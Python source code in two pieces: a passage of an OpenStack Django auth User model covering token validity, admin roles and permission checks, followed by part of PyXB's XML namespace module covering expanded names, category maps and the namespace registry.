Whether user is federated Keystone user. (Boolean)
.. attribute:: unscoped_token
Unscoped Keystone token.
"""
USERNAME_FIELD = 'id'
id = dbmodels.CharField(max_length=240, primary_key=True)
def __init__(self, id=None, token=None, user=None, tenant_id=None,
service_catalog=None, tenant_name=None, roles=None,
authorized_tenants=None, endpoint=None, enabled=False,
services_region=None, user_domain_id=None,
user_domain_name=None, domain_id=None, domain_name=None,
project_id=None, project_name=None,
is_federated=False, unscoped_token=None, password=None):
self.id = id
self.pk = id
self.token = token
self.username = user
self.user_domain_id = user_domain_id
self.user_domain_name = user_domain_name
self.domain_id = domain_id
self.domain_name = domain_name
self.project_id = project_id or tenant_id
self.project_name = project_name or tenant_name
self.service_catalog = service_catalog
self._services_region = (
services_region
or utils.default_services_region(service_catalog)
)
self.roles = roles or []
self.endpoint = endpoint
self.enabled = enabled
self._authorized_tenants = authorized_tenants
self.is_federated = is_federated
# Unscoped token is used for listing user's project that works
# for both federated and keystone user.
self.unscoped_token = unscoped_token
self.password = None
# List of variables to be deprecated.
self.tenant_id = self.project_id
self.tenant_name = self.project_name
self.USERNAME_FIELD = self.username
def __unicode__(self):
return self.username
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.username)
def is_token_expired(self, margin=None):
"""Determine if the token is expired.
Returns ``True`` if the token is expired, ``False`` if not, and
``None`` if there is no token set.
:param margin:
A security time margin in seconds before real expiration.
Will return ``True`` if the token expires in less than ``margin``
seconds of time.
A default margin can be set by the TOKEN_TIMEOUT_MARGIN in the
django settings.
"""
if self.token is None:
return None
return not utils.is_token_valid(self.token, margin)
def is_authenticated(self, margin=None):
"""Checks for a valid authentication.
:param margin:
A security time margin in seconds before end of authentication.
Will return ``False`` if authentication ends in less than ``margin``
seconds of time.
A default margin can be set by the TOKEN_TIMEOUT_MARGIN in the
django settings.
"""
return (self.token is not None and
utils.is_token_valid(self.token, margin))
def is_anonymous(self, margin=None):
"""Return if the user is not authenticated.
Returns ``True`` if not authenticated, ``False`` otherwise.
:param margin:
A security time margin in seconds before end of an eventual
authentication.
Will return ``True`` even if authenticated but that authentication
ends in less than ``margin`` seconds of time.
A default margin can be set by the TOKEN_TIMEOUT_MARGIN in the
django settings.
"""
return not self.is_authenticated(margin)
@property
def is_active(self):
return self.enabled
@property
def is_superuser(self):
"""Evaluates whether this user has admin privileges.
Returns ``True`` or ``False``.
"""
admin_roles = [role.lower() for role in getattr(
settings,
'OPENSTACK_KEYSTONE_ADMIN_ROLES',
['admin'])]
user_roles = [role['name'].lower() for role in self.roles]
return True if set(admin_roles).intersection(user_roles) else False
@property
def authorized_tenants(self):
"""Returns a memoized list of tenants this user may access."""
if self.is_authenticated() and self._authorized_tenants is None:
endpoint = self.endpoint
try:
self._authorized_tenants = utils.get_project_list(
user_id=self.id,
auth_url=endpoint,
token=self.unscoped_token,
is_federated=self.is_federated)
except (keystone_exceptions.ClientException,
keystone_exceptions.AuthorizationFailure):
LOG.exception('Unable to retrieve project list.')
return self._authorized_tenants or []
@authorized_tenants.setter
def authorized_tenants(self, tenant_list):
self._authorized_tenants = tenant_list
@property
def services_region(self):
return self._services_region
@services_region.setter
def services_region(self, region):
self._services_region = region
@property
def available_services_regions(self):
"""Returns list of unique region name values in service catalog."""
regions = []
if self.service_catalog:
for service in self.service_catalog:
service_type = service.get('type')
if service_type is None or service_type == 'identity':
continue
for endpoint in service.get('endpoints', []):
region = utils.get_endpoint_region(endpoint)
if region not in regions:
regions.append(region)
return regions
def save(*args, **kwargs):
# Presume we can't write to Keystone.
pass
def delete(*args, **kwargs):
# Presume we can't write to Keystone.
pass
# Check for OR'd permission rules: check that the user has at least one of
# the required permissions.
def has_a_matching_perm(self, perm_list, obj=None):
"""Returns True if the user has one of the specified permissions.
If object is passed, it checks if the user has any of the required
perms for this object.
"""
# If there are no permissions to check, just return true
if not perm_list:
return True
# Check that user has at least one of the required permissions.
for perm in perm_list:
if self.has_perm(perm, obj):
return True
return False
# Override the default has_perm method. The default implementation allows
# active superusers to have all permissions. Our check is more complicated
# than that: services have to be checked for availability before a panel can
# be exposed. We therefore remove the superuser check and delegate the check
# to the auth backend.
def has_perm(self, perm, obj=None):
"""Returns True if the user has the specified permission.
This method queries all available auth backends, but returns
immediately if any backend returns True. Thus, a user who has
permission from a single auth backend is assumed to have permission
in general. If an object is provided, permissions for this specific
object are checked.
"""
return models._user_has_perm(self, perm, obj)
# Override the default has_perms method to allow for more complex
# combinations of permissions. Checks for a logical AND of all top-level
# permissions, and a logical OR within each first-level tuple (i.e. the user
# must have at least one of the permissions in the tuple).
#
# Examples:
# Checks for all required permissions
# ('openstack.roles.admin', 'openstack.roles.L3-support')
#
# Checks for admin AND (L2 or L3)
# ('openstack.roles.admin', ('openstack.roles.L3-support',
# 'openstack.roles.L2-support'),)
def has_perms(self, perm_list, obj=None):
"""Returns True if the user has all of the specified permissions.
Tuples in the list will possess the required permissions if
the user has a permissions matching one of the elements of
that tuple
"""
# If there are no permissions to check, just return true
if not perm_list:
return True
for perm in perm_list:
if isinstance(perm, basestring):
# check that the permission matches
if not self.has_perm(perm, obj):
return False
else:
# check that a permission in the tuple matches
if not self.has_a_matching_perm(perm, obj):
return False
return True
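# Illustrative call (role names are hypothetical): the check below passes only
# if the user has 'openstack.roles.admin' AND at least one of the L2/L3
# support roles.
#   user.has_perms(('openstack.roles.admin',
#                   ('openstack.roles.L3-support',
#                    'openstack.roles.L2-support')))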
|
|
# -*- coding: utf-8 -*-
# Copyright 2009-2013, Peter A. Bigot
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain a
# copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Classes and global objects related to U{XML Namespaces<http://www.w3.org/TR/2006/REC-xml-names-20060816/index.html>}.
Since namespaces hold all referenceable objects, this module also defines the
infrastructure for resolving named object references, such as schema
components.
"""
import pyxb
import pyxb.utils.utility
from pyxb.utils import six
import xml.dom
import logging
_log = logging.getLogger(__name__)
@pyxb.utils.utility.BackfillComparisons
class ExpandedName (pyxb.cscRoot):
"""Represent an U{expanded name
<http://www.w3.org/TR/REC-xml-names/#dt-expname>}, which pairs a
namespace with a local name.
Because a large number of local elements, and most attributes, have no
namespace associated with them, this is optimized for representing names
with an absent namespace. The hash and equality test methods are set so
that a plain string is equivalent to a tuple of C{None} and that string.
Note that absent namespaces can be represented in two ways: with a
namespace of C{None} (the name "has no namespace"), and with a namespace
that is an L{absent namespace <Namespace.CreateAbsentNamespace>} (the name
"has an absent namespace"). Hash code calculations are done so that the
two alternatives produce the same hash; however, comparison is done so
that the two are distinguished. The latter is the intended behavior; the
former should not be counted upon.
This class allows direct lookup of the named object within a category by
using the category name as an accessor function. That is, if the
namespace of the expanded name C{en} has a category 'typeDefinition', then
the following two expressions are equivalent::
en.typeDefinition()
en.namespace().categoryMap('typeDefinition').get(en.localName())
This class descends from C{tuple} so that its values can be used as
dictionary keys without concern for pointer equivalence.
"""
def namespace (self):
"""The L{Namespace} part of the expanded name."""
return self.__namespace
__namespace = None
def namespaceURI (self):
"""Return the URI of the namespace, or C{None} if the namespace is absent."""
return self.__namespaceURI
__namespaceURI = None
def localName (self):
"""The local part of the expanded name."""
return self.__localName
__localName = None
# Cached tuple representation
__expandedName = None
def validateComponentModel (self):
"""Pass model validation through to namespace part."""
return self.namespace().validateComponentModel()
def uriTuple (self):
"""Return a tuple consisting of the namespace URI and the local name.
This presents the expanded name as base Python types for persistent
storage. Be aware, though, that it will lose the association of the
name with an absent namespace, if that matters to you."""
return ( self.__namespaceURI, self.__localName )
# Treat unrecognized attributes as potential accessor functions
def __getattr__ (self, name):
# Don't try to recognize private names (like __setstate__)
if name.startswith('__'):
return super(ExpandedName, self).__getattr__(name)
ns = self.namespace()
if ns is None:
return lambda: None
# Anything we're going to look stuff up in requires a component model.
# Make sure we have one loaded.
ns.validateComponentModel()
# NOTE: This will raise pyxb.NamespaceError if the category does not exist.
category_value = ns.categoryMap(name).get(self.localName())
return lambda : category_value
def createName (self, local_name):
"""Return a new expanded name in the namespace of this name.
@param local_name: The local name portion of an expanded name.
@return: An instance of L{ExpandedName}.
"""
return ExpandedName(self.namespace(), local_name)
def adoptName (self, name):
"""Return the input name, except if the input name has no namespace,
return a name that uses the namespace from this name with the local
name from the input name.
Use this when the XML document has an unqualified name and we're
processing using an absent default namespace.
@warning: Be careful when using a global name to adopt a name from a
local element: if the local element (with no namespace) has the same
localName as but is different from the global element (with a
namespace), this will improperly provide a namespace when one should
not be present. See the comments in
L{pyxb.binding.basis.element.elementForName}.
"""
if not isinstance(name, ExpandedName):
name = ExpandedName(name)
if name.namespace() is None:
name = self.createName(name.localName())
return name
def __init__ (self, *args, **kw):
"""Create an expanded name.
Expected argument patterns are:
- ( C{str} ) : the local name in an absent namespace
- ( L{ExpandedName} ) : a copy of the given expanded name
- ( C{xml.dom.Node} ) : The name extracted from node.namespaceURI and node.localName
- ( C{str}, C{str} ) : the namespace URI and the local name
- ( L{Namespace}, C{str} ) : the namespace and the local name
- ( L{ExpandedName}, C{str}) : the namespace from the expanded name, and the local name
Wherever C{str} occurs C{unicode} is also permitted.
@keyword fallback_namespace: Optional Namespace instance to use if the
namespace would otherwise be None. This is only used if it is an
absent namespace.
"""
fallback_namespace = kw.get('fallback_namespace')
if 0 == len(args):
raise pyxb.LogicError('Too few arguments to ExpandedName constructor')
if 2 < len(args):
raise pyxb.LogicError('Too many arguments to ExpandedName constructor')
if 2 == len(args):
# Namespace(str, unicode, Namespace) and local name basestring
( ns, ln ) = args
else:
# Local name basestring or ExpandedName or Node
assert 1 == len(args)
ln = args[0]
ns = None
if isinstance(ln, six.string_types):
pass
elif isinstance(ln, tuple) and (2 == len(ln)):
(ns, ln) = ln
elif isinstance(ln, ExpandedName):
ns = ln.namespace()
ln = ln.localName()
elif isinstance(ln, xml.dom.Node):
if not(ln.nodeType in (xml.dom.Node.ELEMENT_NODE, xml.dom.Node.ATTRIBUTE_NODE)):
raise pyxb.LogicError('Cannot create expanded name from non-element DOM node %s' % (ln.nodeType,))
ns = ln.namespaceURI
ln = ln.localName
else:
raise pyxb.LogicError('Unrecognized argument type %s' % (type(ln),))
if (ns is None) and (fallback_namespace is not None):
if fallback_namespace.isAbsentNamespace():
ns = fallback_namespace
if isinstance(ns, six.string_types):
ns = NamespaceForURI(ns, create_if_missing=True)
if isinstance(ns, ExpandedName):
ns = ns.namespace()
if (ns is not None) and not isinstance(ns, Namespace):
raise pyxb.LogicError('ExpandedName must include a valid (perhaps absent) namespace, or None.')
self.__namespace = ns
if self.__namespace is not None:
self.__namespaceURI = self.__namespace.uri()
self.__localName = ln
assert self.__localName is not None
self.__expandedName = ( self.__namespace, self.__localName )
self.__uriTuple = ( self.__namespaceURI, self.__localName )
super(ExpandedName, self).__init__(*args, **kw)
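# Illustrative constructions matching the argument patterns documented above
# (the URI shown is hypothetical):
#   ExpandedName('element')                          -> local name in an absent namespace
#   ExpandedName('http://example.com/ns', 'element') -> namespace URI plus local name
#   ExpandedName(XMLSchema, 'string')                -> Namespace instance plus local name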
def __str__ (self):
assert self.__localName is not None
if self.__namespaceURI is not None:
return '{%s}%s' % (self.__namespaceURI, self.__localName)
return self.localName()
def __hash__ (self):
if self.__namespaceURI is None:
# Handle both str and unicode hashes
return type(self.__localName).__hash__(self.__localName)
return tuple.__hash__(self.__expandedName)
def __otherForCompare (self, other):
if isinstance(other, six.string_types):
other = ( None, other )
if not isinstance(other, tuple):
other = other.__uriTuple
if isinstance(other[0], Namespace):
other = ( other[0].uri(), other[1] )
return other
def __eq__ (self, other):
if other is None:
return False
return 0 == pyxb.utils.utility.IteratedCompareMixed(self.__uriTuple, self.__otherForCompare(other))
def __lt__ (self, other):
if other is None:
return False
return 0 > pyxb.utils.utility.IteratedCompareMixed(self.__uriTuple, self.__otherForCompare(other))
def getAttribute (self, dom_node):
"""Return the value of the attribute identified by this name in the given node.
@return: An instance of C{xml.dom.Attr}, or C{None} if the node does
not have an attribute with this name.
"""
if dom_node.hasAttributeNS(self.__namespaceURI, self.__localName):
return dom_node.getAttributeNS(self.__namespaceURI, self.__localName)
return None
def nodeMatches (self, dom_node):
"""Return C{True} iff the dom node expanded name matches this expanded name."""
return (dom_node.localName == self.__localName) and (dom_node.namespaceURI == self.__namespaceURI)
class NamedObjectMap (dict):
"""An extended dictionary intended to assist with QName resolution.
These dictionaries have an attribute that identifies a category of named
objects within a Namespace; the specifications for various documents
require that certain groups of objects must be unique, while uniqueness is
not required between groups. The dictionary also retains a pointer to the
Namespace instance for which it holds objects."""
def namespace (self):
"""The namespace to which the object map belongs."""
return self.__namespace
__namespace = None
def category (self):
"""The category of objects (e.g., typeDefinition, elementDeclaration)."""
return self.__category
__category = None
def __init__ (self, category, namespace, *args, **kw):
self.__category = category
self.__namespace = namespace
super(NamedObjectMap, self).__init__(*args, **kw)
class _NamespaceCategory_mixin (pyxb.cscRoot):
"""Mix-in that aggregates those aspects of XMLNamespaces that hold
references to categories of named objects.
Arbitrary groups of named objects, each requiring unique names within
themselves, can be saved. Unless configured otherwise, the Namespace
instance is extended with accessors that provide direct access to
individual category maps. The name of the method is the category name
with a suffix of "s"; e.g., if a category "typeDefinition" exists, it can
be accessed from the namespace using the syntax C{ns.typeDefinitions()}.
Note that the returned value from the accessor is a live reference to
the category map; changes made to the map are reflected in the
namespace.
"""
# Map from category strings to NamedObjectMap instances that
# contain the dictionary for that category.
__categoryMap = None
def _reset (self):
"""CSC extension to reset fields of a Namespace.
This one handles category-related data."""
getattr(super(_NamespaceCategory_mixin, self), '_reset', lambda *args, **kw: None)()
self.__categoryMap = { }
def categories (self):
"""The list of individual categories held in this namespace."""
return list(self.__categoryMap.keys())
def _categoryMap (self):
"""Return the whole map from categories to named objects."""
return self.__categoryMap
def categoryMap (self, category):
"""Map from local names to NamedObjectMap instances for the given category."""
try:
return self.__categoryMap[category]
except KeyError:
raise pyxb.NamespaceError(self, '%s has no category %s' % (self, category))
def __defineCategoryAccessors (self):
"""Define public methods on the Namespace which provide access to
individual NamedObjectMaps based on their category.
"""
for category in self.categories():
accessor_name = category + 's'
setattr(self, accessor_name, lambda _map=self.categoryMap(category): _map)
def configureCategories (self, categories):
"""Ensure there is a map for each of the given categories.
Category configuration
L{activates<archive._NamespaceArchivable_mixin.isActive>} a namespace.
Existing maps are not affected."""
self._activate()
if self.__categoryMap is None:
self.__categoryMap = { }
for category in categories:
if not (category in self.__categoryMap):
self.__categoryMap[category] = NamedObjectMap(category, self)
self.__defineCategoryAccessors()
return self
def addCategoryObject (self, category, local_name, named_object):
"""Allow access to the named_object by looking up the local_name in
the given category.
Raises pyxb.NamespaceUniquenessError if an object with the same name
already exists in the category."""
name_map = self.categoryMap(category)
old_object = name_map.get(local_name)
if (old_object is not None) and (old_object != named_object):
raise pyxb.NamespaceUniquenessError(self, '%s: name %s used for multiple values in %s' % (self, local_name, category))
name_map[local_name] = named_object
return named_object
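# Illustrative flow (category and object names are hypothetical): once a
# category is configured, the generated plural accessor exposes the live map.
#   ns.configureCategories(['typeDefinition'])
#   ns.addCategoryObject('typeDefinition', 'myType', my_type_component)
#   ns.typeDefinitions()['myType'] is my_type_component   -> True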
def replaceCategoryObject (self, category, local_name, old_object, new_object):
"""Replace the referenced object in the category.
The new object will be added only if the old_object matches the
current entry for local_name in the category."""
name_map = self.categoryMap(category)
if old_object == name_map.get(local_name):
name_map[local_name] = new_object
return name_map[local_name]
def _replaceComponent_csc (self, existing_def, replacement_def):
"""Replace a component definition where present in the category maps.
@note: This is a high-cost operation, as every item in every category
map must be examined to see whether its value field matches
C{existing_def}."""
for (cat, registry) in six.iteritems(self.__categoryMap):
for (k, v) in registry.items(): # NB: Not iteritems
if v == existing_def:
del registry[k]
if replacement_def is not None:
registry[k] = replacement_def
return getattr(super(_NamespaceCategory_mixin, self), '_replaceComponent_csc', lambda *args, **kw: replacement_def)(existing_def, replacement_def)
# Verify that the namespace category map has no components recorded. This
# is the state that should hold prior to loading a saved namespace; at
# the moment, we do not support aggregating components defined separately
# into the same namespace. That should be done at the schema level using
# the "include" element.
def __checkCategoriesEmpty (self):
if self.__categoryMap is None:
return True
assert isinstance(self.__categoryMap, dict)
if 0 == len(self.__categoryMap):
return True
for k in self.categories():
if 0 < len(self.categoryMap(k)):
return False
return True
def _namedObjects (self):
objects = set()
for category_map in six.itervalues(self.__categoryMap):
objects.update(six.itervalues(category_map))
return objects
def _loadNamedObjects (self, category_map):
"""Add the named objects from the given map into the set held by this namespace.
It is an error to name something which is already present."""
self.configureCategories(six.iterkeys(category_map))
for category in six.iterkeys(category_map):
current_map = self.categoryMap(category)
new_map = category_map[category]
for (local_name, component) in six.iteritems(new_map):
existing_component = current_map.get(local_name)
if existing_component is None:
current_map[local_name] = component
elif existing_component._allowUpdateFromOther(component):
existing_component._updateFromOther(component)
else:
raise pyxb.NamespaceError(self, 'Load attempted to override %s %s in %s' % (category, local_name, self.uri()))
self.__defineCategoryAccessors()
def hasSchemaComponents (self):
"""Return C{True} iff schema components have been associated with this namespace.
This only checks whether the corresponding categories have been added,
not whether there are any entries in those categories. It is useful
for identifying namespaces that were incorporated through a
declaration but never actually referenced."""
return 'typeDefinition' in self.__categoryMap
def _associateOrigins (self, module_record):
"""Add links from L{pyxb.namespace.archive._ObjectOrigin} instances.
For any resolvable item in this namespace from an origin managed by
the module_record, ensure that item can be found via a lookup through
that origin.
This allows these items to be found when a single namespace comprises
items translated from different schema at different times using
archives to maintain consistency."""
assert module_record.namespace() == self
module_record.resetCategoryObjects()
self.configureCategories([archive.NamespaceArchive._AnonymousCategory()])
origin_set = module_record.origins()
for (cat, cat_map) in six.iteritems(self.__categoryMap):
for (n, v) in six.iteritems(cat_map):
if isinstance(v, archive._ArchivableObject_mixin) and (v._objectOrigin() in origin_set):
v._objectOrigin().addCategoryMember(cat, n, v)
class _ComponentDependency_mixin (pyxb.utils.utility.PrivateTransient_mixin, pyxb.cscRoot):
"""Mix-in for components that can depend on other components."""
__PrivateTransient = set()
# Cached frozenset of components on which this component depends.
__bindingRequires = None
__PrivateTransient.add('bindingRequires')
def _resetClone_csc (self, **kw):
"""CSC extension to reset fields of a component. This one clears
dependency-related data, since the clone will have to revise its
dependencies.
@rtype: C{None}"""
getattr(super(_ComponentDependency_mixin, self), '_resetClone_csc', lambda *_args, **_kw: None)(**kw)
self.__bindingRequires = None
def bindingRequires (self, reset=False, include_lax=False):
"""Return a set of components upon whose bindings this component's
bindings depend.
For example, bindings that are extensions or restrictions depend on
their base types. Complex type definition bindings require that the
types of their attribute declarations be available at the class
definition, and the types of their element declarations in the
postscript.
@keyword include_lax: if C{False} (default), only the requirements of
the class itself are returned. If C{True}, all requirements are
returned.
@rtype: C{set(L{pyxb.xmlschema.structures._SchemaComponent_mixin})}
"""
if reset or (self.__bindingRequires is None):
if isinstance(self, resolution._Resolvable_mixin) and not (self.isResolved()):
raise pyxb.LogicError('Unresolved %s in %s: %s' % (self.__class__.__name__, self._namespaceContext().targetNamespace(), self.name()))
self.__bindingRequires = self._bindingRequires_vx(include_lax)
return self.__bindingRequires
def _bindingRequires_vx (self, include_lax):
"""Placeholder for subclass method that identifies the necessary components.
@note: Override in subclasses.
@return: The component instances on which this component depends
@rtype: C{frozenset}
@raise LogicError: A subclass failed to implement this method
"""
raise pyxb.LogicError('%s does not implement _bindingRequires_vx' % (type(self),))
class _NamespaceComponentAssociation_mixin (pyxb.cscRoot):
"""Mix-in for managing components defined within this namespace.
The component set includes not only top-level named components (such as
those accessible through category maps), but internal anonymous
components, such as those involved in representing the content model of a
complex type definition. We need to be able to get a list of these
components, sorted in dependency order, so that generated bindings do not
attempt to refer to a binding that has not yet been generated."""
# A set containing all components, named or unnamed, that belong to this
# namespace.
__components = None
def _reset (self):
"""CSC extension to reset fields of a Namespace.
This one handles data related to component association with a
namespace."""
getattr(super(_NamespaceComponentAssociation_mixin, self), '_reset', lambda *args, **kw: None)()
self.__components = set()
self.__origins = set()
self.__schemaMap = { }
def _associateComponent (self, component):
"""Record that the responsibility for the component belongs to this namespace."""
self._activate()
assert self.__components is not None
assert isinstance(component, _ComponentDependency_mixin)
assert component not in self.__components
self.__components.add(component)
def _replaceComponent_csc (self, existing_def, replacement_def):
"""Replace a component definition in the set of associated components.
@raise KeyError: C{existing_def} is not in the set of components."""
self.__components.remove(existing_def)
if replacement_def is not None:
self.__components.add(replacement_def)
return getattr(super(_NamespaceComponentAssociation_mixin, self), '_replaceComponent_csc', lambda *args, **kw: replacement_def)(existing_def, replacement_def)
def addSchema (self, schema):
for sr in self.__origins:
if isinstance(sr, archive._SchemaOrigin) and sr.match(schema=schema):
_log.info('Hash for %s matches %s already registered as %s', schema.location(), sr.schema().location(), self)
raise pyxb.SchemaUniquenessError(self, schema.location(), sr.schema())
sr = archive._SchemaOrigin(schema=schema)
schema.generationUID().associateObject(sr)
self.__origins.add(sr)
return sr
def lookupSchemaByLocation (self, schema_location):
for sr in self.__origins:
if isinstance(sr, archive._SchemaOrigin) and sr.match(location=schema_location):
return (True, sr.schema())
for mr in self.moduleRecords():
if mr.hasMatchingOrigin(location=schema_location):
return (True, None)
return (False, None)
def schemas (self):
s = set()
for sr in self.__origins:
if isinstance(sr, archive._SchemaOrigin) and (sr.schema() is not None):
s.add(sr.schema())
return s
__origins = None
def components (self):
"""Return a frozenset of all components, named or unnamed, belonging
to this namespace."""
return frozenset(self.__components)
def _releaseNamespaceContexts (self):
for c in self.__components:
c._clearNamespaceContext()
from pyxb.namespace import archive
from pyxb.namespace.utility import NamespaceInstance
from pyxb.namespace.utility import NamespaceForURI
from pyxb.namespace.utility import CreateAbsentNamespace
from pyxb.namespace.utility import AvailableNamespaces
from pyxb.namespace import resolution
NamespaceContext = resolution.NamespaceContext
class Namespace (_NamespaceCategory_mixin, resolution._NamespaceResolution_mixin, _NamespaceComponentAssociation_mixin, archive._NamespaceArchivable_mixin):
"""Represents an XML namespace (a URI).
There is at most one L{Namespace} class instance per namespace (URI). The
instance also supports associating arbitrary L{maps<NamedObjectMap>} from
names to objects, in separate categories. The default categories are
configured externally; for example, the
L{Schema<pyxb.xmlschema.structures.Schema>} component defines a category
for each named component in XMLSchema, and the customizing subclass for
WSDL definitions adds categories for the service bindings, messages, etc.
Namespaces can be written to and loaded from pickled files. See
L{NamespaceArchive} for information.
"""
# The URI for the namespace. If the URI is None, this is an absent
# namespace.
__uri = None
# An identifier, unique within a program using PyXB, used to distinguish
# absent namespaces. Currently this value is not accessible to the user,
# and exists solely to provide a unique identifier when printing the
# namespace as a string. The class variable is used as a one-up counter,
# which is assigned to the instance variable when an absent namespace
# instance is created.
__absentNamespaceID = 0
# A prefix bound to this namespace by standard. Currently this is known to
# apply only to the xml and xmlns namespaces.
__boundPrefix = None
# A prefix set as a preferred prefix, generally by processing a namespace
# declaration.
__prefix = None
# A map from URIs to Namespace instances. Namespaces instances
# must be unique for their URI. See __new__().
__Registry = { }
# A set of all absent namespaces created.
__AbsentNamespaces = set()
# Optional description of the namespace
__description = None
# Indicates whether this namespace is built-in to the system
__isBuiltinNamespace = False
# Indicates whether this namespace is undeclared (available always)
__isUndeclaredNamespace = False
# Indicates whether this namespace was loaded from an archive
__isLoadedNamespace = False
# Archive from which the namespace can be read, or None if no archive
# defines this namespace.
__namespaceArchive = None
# Indicates whether this namespace has been written to an archive
__hasBeenArchived = False
# Holds the module path for builtin modules until we get a ModuleRecord to
# store that in.
__builtinModulePath = None
# A set of options defining how the Python bindings for this namespace
# were generated. Not currently used, since we don't have different
# binding configurations yet.
__bindingConfiguration = None
# The namespace context used when creating built-in components that belong
# to this namespace. This is used to satisfy the low-level requirement
# that all schema components have a namespace context; normally, that
# context is built dynamically from the schema element.
__initialNamespaceContext = None
# The default_namespace parameter when creating the initial namespace
# context. Only used with built-in namespaces.
__contextDefaultNamespace = None
# The map from prefixes to namespaces as defined by the schema element for
# this namespace. Only used with built-in namespaces.
__contextInScopeNamespaces = None
@classmethod
def _NamespaceForURI (cls, uri):
"""If a Namespace instance for the given URI exists, return it; otherwise return None.
Note: Absent namespaces are not stored in the registry. If you use
one (e.g., for a schema with no target namespace), don't lose hold of
it."""
if uri is None:
raise pyxb.UsageError('Absent namespaces are unlocatable')
return cls.__Registry.get(uri)
# A map from string UUIDs to absent Namespace instances. Used for
# in-session deserialization as required for cloning objects. Non-absent
# namespaces are identified by URI and recorded in __Registry.
__AbsentNamespaceRegistry = { }
# The UUID used to serialize this namespace. This serves the same role in
# __AbsentNamespaceRegistry as the namespace URI does in __Registry, but
# is retained only within a single PyXB session.
__absentSerializedUUID = None
__SerializedVariantAbsent = 'absent'
def __getnewargs__ (self):
"""Pickling support.
To ensure that unpickled Namespace instances are unique per
URI, we ensure that the routine that creates unpickled
instances knows what it's supposed to return."""
if self.uri() is None:
# We can't reconstruct absent namespaces. However, it is
# convenient to be able to use Python's copy module to clone
# instances. Support for that does require ability to identify
# specific absent namespaces, which we do by representing them as
# a tuple containing a variant tag and unique identifier.
if self.__absentSerializedUUID is None:
_log.warning('Instances with absent namespaces can only be reconstructed in-session')
self.__absentSerializedUUID = pyxb.utils.utility.UniqueIdentifier()
self.__AbsentNamespaceRegistry[self.__absentSerializedUUID.uid()] = self
return ((self.__SerializedVariantAbsent, self.__absentSerializedUUID.uid()),)
return (self.uri(),)
def __new__ (cls, *args, **kw):
"""Pickling and singleton support.
This ensures that no more than one Namespace instance exists
for any given URI. We could do this up in __init__, but that
doesn't normally get called when unpickling instances; this
does. See also __getnewargs__()."""
(uri,) = args
if isinstance(uri, tuple):
# Special handling to reconstruct absent namespaces.
(variant, uid) = uri
if cls.__SerializedVariantAbsent == variant:
ns = cls.__AbsentNamespaceRegistry.get(uid)
if ns is None:
raise pyxb.UsageError('Unable to reconstruct instance of absent namespace')
return ns
raise pyxb.LogicError('Unrecognized serialized namespace variant %s uid %s' % (variant, uid))
elif not (uri in cls.__Registry):
instance = object.__new__(cls)
# Do this one step of __init__ so we can do checks during unpickling
instance.__uri = uri
instance._reset()
# Absent namespaces are not stored in the registry.
if uri is None:
cls.__AbsentNamespaces.add(instance)
return instance
cls.__Registry[uri] = instance
return cls.__Registry[uri]
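# Illustrative consequence of the per-URI registry (the URI is hypothetical):
# looking up the same URI twice yields the same instance.
#   ns = NamespaceForURI('urn:example:ns', create_if_missing=True)
#   NamespaceForURI('urn:example:ns') is ns   -> True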
@classmethod
def AvailableNamespaces (cls):
"""Return a set of all Namespace instances defined so far."""
return cls.__AbsentNamespaces.union(six.itervalues(cls.__Registry))
def __init__ (self, uri,
description=None,
builtin_namespace=None,
builtin_module_path=None,
is_undeclared_namespace=False,
is_loaded_namespace=False,
bound_prefix=None,
default_namespace=None,
in_scope_namespaces=None):
"""Create a new Namespace.
The URI must be non-None, and must not already be assigned to
a Namespace instance. See _NamespaceForURI().
User-created Namespace instances may also provide a description.
Users should never provide a builtin_namespace parameter.
"""
# New-style superclass invocation
super(Namespace, self).__init__()
self.__contextDefaultNamespace = default_namespace
self.__contextInScopeNamespaces = in_scope_namespaces
# Make sure that we're not trying to do something restricted to
# built-in namespaces
is_builtin_namespace = not (builtin_namespace is None)
if not is_builtin_namespace:
if bound_prefix is not None:
raise pyxb.LogicError('Only permanent Namespaces may have bound prefixes')
# We actually set the uri when this instance was allocated;
# see __new__().
assert self.__uri == uri
self.__boundPrefix = bound_prefix
self.__description = description
self.__isBuiltinNamespace = is_builtin_namespace
self.__builtinNamespaceVariable = builtin_namespace
self.__builtinModulePath = builtin_module_path
self.__isUndeclaredNamespace = is_undeclared_namespace
self.__isLoadedNamespace = is_loaded_namespace
self._reset()
assert (self.__uri is None) or (self.__Registry[self.__uri] == self)
def _reset (self):
assert not self.isActive()
getattr(super(Namespace, self), '_reset', lambda *args, **kw: None)()
self.__initialNamespaceContext = None
def uri (self):
"""Return the URI for the namespace represented by this instance.
If the URI is None, this is an absent namespace, used to hold
declarations not associated with a namespace (e.g., from schema with
no target namespace)."""
return self.__uri
def setPrefix (self, prefix):
if self.__boundPrefix is not None:
if self.__boundPrefix == prefix:
return self
raise pyxb.NamespaceError(self, 'Cannot change the prefix of a bound namespace')
if (None is not prefix) and (0 == len(prefix)):
raise pyxb.UsageError('prefix must be non-empty string')
self.__prefix = prefix
return self
def prefix (self):
if self.__boundPrefix:
return self.__boundPrefix
return self.__prefix
def isAbsentNamespace (self):
"""Return True iff this namespace is an absent namespace.
Absent namespaces have no namespace URI; they exist only to
hold components created from schemas with no target
namespace."""
return self.__uri is None
def fallbackNamespace (self):
"""When known to be operating in this namespace, provide the Namespace
instance to be used when names are associated with no namespace."""
if self.isAbsentNamespace():
return self
return None
@classmethod
def CreateAbsentNamespace (cls):
"""Create an absent namespace.
Use this instead of the standard constructor, in case we need
to augment it with a uuid or the like."""
rv = Namespace(None)
rv.__absentNamespaceID = cls.__absentNamespaceID
cls.__absentNamespaceID += 1
return rv
def _overrideAbsentNamespace (self, uri):
assert self.isAbsentNamespace()
self.__uri = uri
def boundPrefix (self):
"""Return the standard prefix to be used for this namespace.
Only a few namespace prefixes are bound to namespaces: xml and xmlns
are two. In all other cases, this method should return None. The
infrastructure attempts to prevent user creation of Namespace
instances that have bound prefixes."""
return self.__boundPrefix
def isBuiltinNamespace (self):
"""Return True iff this namespace was defined by the infrastructure.
That is the case for all namespaces in the Namespace module."""
return self.__isBuiltinNamespace
def builtinNamespaceRepresentation (self):
assert self.__builtinNamespaceVariable is not None
